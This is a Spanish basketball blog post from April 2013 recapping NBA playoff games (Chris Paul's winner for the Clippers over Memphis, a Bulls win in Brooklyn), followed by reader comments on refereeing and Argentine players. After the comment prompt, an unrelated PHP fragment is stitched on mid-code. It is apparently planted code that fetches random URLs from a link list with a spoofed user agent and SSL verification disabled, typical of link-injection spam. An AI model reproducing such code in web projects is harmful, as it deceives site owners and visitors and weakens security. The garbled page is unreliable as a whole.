La Crónica: Decisivo Paul

23 de April de 2013 por Simon

Ya lo señalaba en la previa de esta eliminatoria nuestro compañero MagicJohnson32: la eliminatoria entre dos equipos tan igualados como Memphis y Clippers la iba a decantar Chris Paul.

Tras un primer partido en el que Clippers ganó sin problemas gracias a un último cuarto de escándalo, en éste Memphis consiguió  igualar un poco más la balanza. Las primeras ventajas del partido fueron para los Grizzlies aunque nunca superaron los 5 puntos de ventaja. Los balones llegaban en mejores situaciones a los pívots que conseguían anotar fácil. En el segundo cuarto los Clippers consiguieron ponerse por delante y el partido comenzó a jugarse al ritmo que marcaba Paul. Los de Los Angeles cogieron las primeras ventajas a su favor y en el tercer cuarto y con la segunda unidad en pista se fueron de más de 10 puntos y nos hicieron creer que el partido estaba finiquitado. Nada más lejos de la realidad. Mike Conley, que estuvo fantástico todo el partido, aceleró un  poco más el ritmo de Memphis y conectó  algunos buenos balones con Darrell Arthur que jugó los minutos finales en detrimento de Z-Bo.  La defensa capitaneada por Marc Gasol hizo el resto y el partido comenzaba de nuevo a apenas minuto y medio de la conclusión con empate a 89. Paul anotó una meritoria canasta que fue contrarrestada por un mate de Gasol tras pase de Conley. Faltaban 14 segundos y el balón estaba en posesión de Chris Paul que consiguió superar a Tony Allen para anotar la canasta decisiva y sumar el segundo punto de la eliminatoria (91-93). No estuvo exento de polémica el partido, en la última jugada parece claro que existe una falta de Chris Paul que empuja con su brazo repetidas veces a Tony Allen durante la jugada para hacerse hueco hacia canasta. Por los Clippers, Paul acabó el partido con 24 puntos y 9 asistencias mientras que Griffin aportó 21 puntos y 8 rebotes. En Memphis, Conley tuvo su principal apoyo en Marc Gasol que a pesar de su buen partido sigue sin lograr buenos porcentajes en esta serie.

Tras esta derrota, los Grizzlies se encuentran con un tercer partido en el que tendrán una presión enorme pues una derrota significaría decir adiós a todas sus opciones de avanzar ronda. 

En el otro extremo de Estados Unidos se disputaba el otro partido de la jornada de ayer. Chicago logró la victoria capitaneado por un grandísimo juego colectivo en el que todos los jugadores aportaron y consiguieron la primera victoria visitante en estos PlayOff. Brooklyn no fue capaz de controlar el rebote y el mal partido de Deron Williams condenó a sus Nets.

Desde el inicio, aún con pequeñas ventajas, Chicago fue el que llevó  el peso y el ritmo del partido. Apenas Brook López contrarrestaba el juego rápido e intenso que estaba practicando Chicago. En la segunda parte, con un gran tercer cuarto en defensa en el que Brooklyn apenas anotó 11 puntos, Chicago fue capaz de continuar con el guión de la primera parte y lograr ventajas superiores a 10 puntos que tan solo tuvo que administrar en el último cuarto (90-82).  Hasta 7 jugadores tuvo Chicago Bulls por encima de los 8 puntos. Deng, Boozer y Noah lograron un doble-doble.  En Brooklyn apenas Brook López y Joe Johnson estuvieron a un nivel aceptable.

La serie viaja ahora a Chicago donde los Bulls tratarán de hacer valer el factor cancha y dar un golpe casi mortal a la eliminatoria si son capaces de ganar los dos partidos.

PREMIOS

MVP: 24 puntos, 9 asistencias, 4 rebotes y una canasta imposible para dar la victoria a su equipo y poner el 2-0 en el marcados. “Hola, me llamo Chris Paul.”

Sorpresa: A parte de defender como un jabato, Tony Allen se destapó como arma ofensiva. Consiguió 16 puntos que aderezó con 10 rebotes.

Decepción: Tras liderar a los suyos en la victoria en el primer partido, ayer Deron Williams saltó a la cancha con el punto de mira desviado. Se quedó en 8 puntos y un 1 de 9 en tiros de campo.

Esfuerzo en vano: No todos los días se consigue el récord anotador de tu carrera. Lo cruel es conseguirlo y aún así perder el partido. Los 28 puntos y 9 asistencias de Mike Conley se quedaron en nada por culpa, principalmente, del base rival.

Imágenes | AP Photos / Getty Images

Comenta

13 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Aparte de la falta de Paul, lo que sí es su entrada a canasta son DOBLES por agarrar el balón con la mano y seguir botando. Es un canastón, pero con el reglamento en la mano no debería haberlo sido. Por ejemplo, por mucho menos a Isaiah Thomas le pitaron varias veces dobles en el último partido de los Kings. De hecho, esa juagada de Paul, en Europa jamás sería discutida acerca de la falta en ataque o los dobles. Algo le pitarían seguro, pero en Están tos Undidos joder un game winner por el reglamento… como que no

      Citar

  2. Jose Luis dice:
    #2

    Si, ahora viendo la repetición veo a que te refieres Sancho. En fin, es eso, no van a joderle una última jugada a la estrella local, si hubiera sido Conley por ejemplo… lo hubieran pitado fijo.

    Es el problema de Memphis, que o gana de paliza o lo tiene complicado, y no tienen suficientes anotadores que se enchufen como para ganar de paliza.

      Citar

  3. rumbero dice:
    #3

    Sancho88:
    Algo le pitarían seguro, pero en Están tos Undidos joder un game winner por el reglamento… como que no

    Es que para pitarle algo a Paul, en el Staples, con un Game winner en PO…demasiados factores. Algo serio sus últimos 4 minutos de partido aunque sea algo bastante habitual ya.

    Pero lo que quería reivindicar hoy es el premio extra MHP o “Más huevos en pista” para el señor Noah. Es para verlo ahí medio cojo y dejándose la piel. Seguramente no esté ni para jugar pero ahí lo tenemos, dando 25 minutos de los suyos. Si pueden contar con él medianamente bien tiene opciones los Bulls.

      Citar

  4. txusma dice:
    #4

    Muy grande Joakim Noah. MUY grande.

      Citar

  5. Esteban dice:
    #5

    no seamos ingenuos, nadie en la nba hubiese pitado ni falta en ataque ni dobles,
    pensar que a un local o a un visitante le hubiesen ptado eso es no haber visto nunca la nba

      Citar

  6. Esteban dice:
    #6

    estos clippers son mucho mejores que los del año pasado, su banca es mas confiable y griffin esta bastante mejor

    mientras que menphis, en partido asi, en mi opinion extraña a gay y su capacidad de armarse su propio tiro en momento calientes

    ahora son dos o tres juegos en menphis?

      Citar

  7. Jose Luis dice:
    #7

    ¿Seguro esteban?

    http://www.youtube.com/watch?v=itRfHkLZw3I

    La única diferencia es que son PO

      Citar

  8. Esteban dice:
    #8

    off topic total, pero ya que hay tantos españoles aqui y yo soy argentino, quisiera que me den su opinion sobre 3 argetinos que actualmente juegan enla acb, nicolas richotti, juan jasen y leo mainoldi, que participacion tienen, que progresion le ven

    no ha habido recambio generacional en argentina, y esos 3 chicos son los uinicos que se han hecho un huyevo en el viejo contienente

      Citar

  9. Sancho88 dice:
    #9

    Richotti es un tirador tipo Jaycee Carroll. Yo lo vi en directo el año pasado cuando estaba en LEB jugando contra Palencia y nos masacró vivos junto a Levi Rost. Se genera sus propios tiros (Richotti), sabe buscar las faltas y no es mal pasador. Lo que pasa es que tiene un handicap de altura considerable, no destaca por su defensa (aunque es bueno robando), es inconstante y yo diría que este es su techo competitivo, ser un jugador de rol tirador de algún equipo mediano, no más. Si recuerdas a Paolo Quinteros, pues bien, para mí Quinteros sí que era mejor jugador que Richotti, más completo. Pues hazte una idea…

    LaJuani (como popularmente se conoce al hermano pequeño de Hernán, Juan Ignacio) tiene muy buen tiro de tres, en Granada y Murcia lo ha demostrado, pero también es muy inconstante, este sí que es un jugador de rachas. Yo lo compararía con Fede Kammerichs, pero, obviamente, Fede era mil veces mejor que Juani, por eso te digo que el nivel de la ACB está en mierda.

    Y Mainoldi, este tio iba para estrella en Valencia. Creo que es de la quinta de Faverani, otro que apuntaba a NBA pero por su culo gordo no va a llegar. Mainoldi tiene el handicap del físico, un 4 abierto, buen tirador, penetrador, saca muy bien las faltas… no sé, en ofensiva se le puede comparar a Pablo Aguilar, pero en defensa y tiros libres… no me gusta mucho.

    Es que en general, los jugadores argentinos suelen ser tipos de rachas. Excepto el mejor Prigioni del Tau, que era un jodido reloj en estadísticas, y Oberto (para mí, junto a Scola y Ginobili, los tres mejores de la historia de Argentina) si hablamos de Nocioni, Kammerichs, Herrman, Montecchia, Sconochini, Pepe Sánchez (puto crack), Juanpi Gutierrez (este era maravillosamente irregular), gordaco Gabini, triplista Racca, pedazo de base Gianella, Wolkowiski… eran tipos de rachas, que te la podían liar si estaban inspirados, pero a veces te desesperaban. Por eso en la selección la han liado tan gorda y han sido campeones olímpicos, porque juntos formaban un equipazo, pero a veces se desmotivaban jugando en otras partes del mundo.

    No sé, en general parece que Richotti tiene una carrera medianamente ascendente, pero Juani es un rellena plantillas y Mainoldi en mi opinión está estancado con todo lo que prometía

      Citar

  10. Sancho88 dice:
    #10

    Ah, y se me olvidaba, ESPIL!! este sí que era un tirador maravilloso, aunque para mí, el mejor tirador que ha jugado en España ha sido Velimir Perasovic en su etapa en Fuenlabrada

      Citar

  11. HisRoyalAirness dice:
    #11

    Sancho88:
    Aparte de la falta de Paul, lo que sí es su entrada a canasta son DOBLES por agarrar el balón con la mano y seguir botando. Es un canastón, pero con el reglamento en la mano no debería haberlo sido. Por ejemplo, por mucho menos a Isaiah Thomas le pitaron varias veces dobles en el último partido de los Kings. De hecho, esa juagada de Paul, en Europa jamás sería discutida acerca de la falta en ataque o los dobles. Algo le pitarían seguro, pero en Están tos Undidos joder un game winner por el reglamento… como que no

    GRACIAS SANCHO, me metí aquí para decir eso!! El tío agarra el balón contra la pierna!!

    Qué mal me cae, se puso tonto con Marc y luego se cagó como una rata

      Citar

  12. Esteban dice:
    #12

    gracias sancho por la informacion, una pena que no sea muy alentadora jajajaja

    pero bueno, son los 3 jovenes con cierta presencia en españa que tenemos, en italia esta juan fernandez y hasta alli llegamos,

    epoca de vacas flacas

      Citar

  13. GreenPride dice:
    #13

    Primera victoria visitante en estos Playoffs. Los Bulls desde luego son un equipo limitado pero con un gran corazón para jugar a esto. Lo primero que lograron fue cambiar el ritmo del partido. A base de cargar el rebote y bajar el culo en defensa se acabaron las canastas fáciles para los Nets. En el primer tiempo siguieron teniendo el problema de Lopez que seguía anotando con fluidez ante Noah pero en el segundo Noah se dejó el alma en ambos aros y fue clave tanto en defensa como en ataque. A parte el malísimo partido de Deron junto a la habitual inconsistencia de JoJo y Wallace en ataque dejó a los Nets sin poder anotar durante gran parte de la segunda parte. Ahora traslado a Chicago donde los Nets necesitarán desesperadamente una victoria y tendrán que sudarla. Son un equipo con más calidad y si consiguen destrabar el partido deberían ser capaces de ganar alguno.
    En la otra eliminatoria se vivió lo que todos esperábamos de este emparejamiento. Partido a cara de perro y decisión en los minutos finales de un gran CP3. Es cierto que la última jugada es irregular pero ya llevaba tres canastas antes de esa. El principal problema de los Grizzlies es que Z-Bo está siendo clarísimamente superado por la movilidad e intensidad de los interiores de Clippers (Griffin sobre todo) que le están sacando de los partidos forzándole faltas y malos tiros. En este se mantuvieron gracias a un fenomenal Conley sobreviviendo a la racha de Crawford en el segundo y al arreón de los suplentes de los de LA en el último pero finalmente no pudieron con CP3. Complicado para Memphis que físicamente está un punto por debajo de los Clippers y que tiene un banquillo claramente inferior al de su rival. Veremos si la tendencia cambia en Memphis que aún queda mucha eliminatoria

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>